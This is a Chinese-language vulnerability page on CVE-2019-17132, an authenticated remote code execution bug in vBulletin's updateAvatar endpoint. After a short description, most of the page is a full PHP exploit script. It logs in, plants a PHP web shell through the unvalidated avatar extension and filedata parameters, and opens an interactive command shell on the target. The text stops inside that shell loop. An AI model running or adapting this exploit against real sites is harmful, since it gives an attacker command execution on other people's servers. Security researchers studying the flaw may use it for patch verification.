（CVE-2019-17132）vBulletin 5.0 \<5.5.4-\'updateAvatar\'身份验证的远程代码执行漏洞
==================================================================================

一、漏洞简介
------------

用户输入更新头像的的时候，前未正确验证提交的"数据\[扩展\]"和"数据\[文件数据\]"参数就发送到了"
ajax / api / user / updateavatar"，导致此突破的产生

利用此突破可以插入和执行任意php代码。

成功利用此突破需要"将头像另存为Files（头像保存为文件）"选项要启用（可选情况下少量）。

二、漏洞影响
------------

三、复现过程
------------

    <?php

    /*
        ---------------------------------------------------------------------
        vBulletin <= 5.5.4 (updateAvatar) 远程代码执行漏洞
        ---------------------------------------------------------------------

    */

    set_time_limit(0);
    error_reporting(E_ERROR);

    if (!extension_loaded("curl")) die("[-] cURL extension required!\n");

    print "+-------------------------------------------------------------------------+";
    print "\n| vBulletin <= 5.5.4 (updateAvatar) Remote Code Execution Exploit by EgiX |";
    print "\n+-------------------------------------------------------------------------+\n";

    if ($argc != 4)
    {
            print "\nUsage......: php $argv[0] <URL> <Username> <Password>\n";
            print "\nExample....: php $argv[0] http://localhost/vb/ user passwd";
            print "\nExample....: php $argv[0] [url]https://vbulletin.com/[/url] evil hacker\n\n";
            die();
    }

    list($url, $user, $pass) = [$argv[1], $argv[2], $argv[3]];

    $ch = curl_init();

    curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);
    curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
    curl_setopt($ch, CURLOPT_HEADER, true);

    print "\n[-] Logging in with username '{$user}' and password '{$pass}'\n";

    curl_setopt($ch, CURLOPT_URL, $url);

    if (!preg_match("/Cookie: .*sessionhash=[^;]+/", curl_exec($ch), $sid)) die("[-] Session ID not found!\n");

    curl_setopt($ch, CURLOPT_URL, "{$url}?routestring=auth/login");
    curl_setopt($ch, CURLOPT_HTTPHEADER, $sid);
    curl_setopt($ch, CURLOPT_POSTFIELDS, "username={$user}&password={$pass}");

    if (!preg_match("/Cookie: .*sessionhash=[^;]+/", curl_exec($ch), $sid)) die("[-] Login failed!\n");

    print "[-] Logged-in! Retrieving security token...\n";

    curl_setopt($ch, CURLOPT_URL, $url);
    curl_setopt($ch, CURLOPT_POST, false);
    curl_setopt($ch, CURLOPT_HTTPHEADER, $sid);

    if (!preg_match('/token": "([^"]+)"/', curl_exec($ch), $token)) die("[-] Security token not found!\n");

    print "[-] Uploading new avatar...\n";

    $params = ["profilePhotoFile" => new CURLFile("avatar.jpeg"), "securitytoken" => $token[1]];

    curl_setopt($ch, CURLOPT_URL, "{$url}?routestring=profile/upload-profilepicture");
    curl_setopt($ch, CURLOPT_POSTFIELDS, $params);
    curl_setopt($ch, CURLOPT_HEADER, false);

    if (($path = (json_decode(curl_exec($ch)))->avatarpath) == null) die("[-] Upload failed!\n");

    if (preg_match('/image\.php\?/', $path)) die("[-] Sorry, the 'Save Avatars as Files' option is disabled!\n");

    print "[-] Updating avatar with PHP shell...\n";

    $php_code = '<?php print("____"); passthru(base64_decode($_SERVER["HTTP_CMD"])); ?>';

    $params = ["routestring" => "ajax/api/user/updateAvatar",
               "userid" => 0,
               "avatarid" => 0,
               "data[extension]" => "php",
               "data[filedata]" => $php_code,
               "securitytoken" => $token[1]];

    curl_setopt($ch, CURLOPT_URL, $url);
    curl_setopt($ch, CURLOPT_POSTFIELDS, http_build_query($params));

    if (curl_exec($ch) !== "true") die("[-] Update failed!\n");

    print "[-] 上传shell中...\n";

    preg_match('/(\d+)\.jpeg/', $path, $m);
    $path = preg_replace('/(\d+)\.jpeg/', ($m[1]+1).".php", $path);

    curl_setopt($ch, CURLOPT_URL, "{$url}core/{$path}");
    curl_setopt($ch, CURLOPT_POST, false);

    while(1)
    {
        print "\nvb-shell# ";
        if (($cmd = trim(fgets(STDIN))) == "exit") break;
        curl_setopt($ch, CURLOPT_HTTPHEADER, ["CMD: ".base64_encode($cmd)]);
        preg_match('/____(.*)/s', curl_exec($ch), $m) ? print $m[1] : die("\n[-] Exploit failed!\n");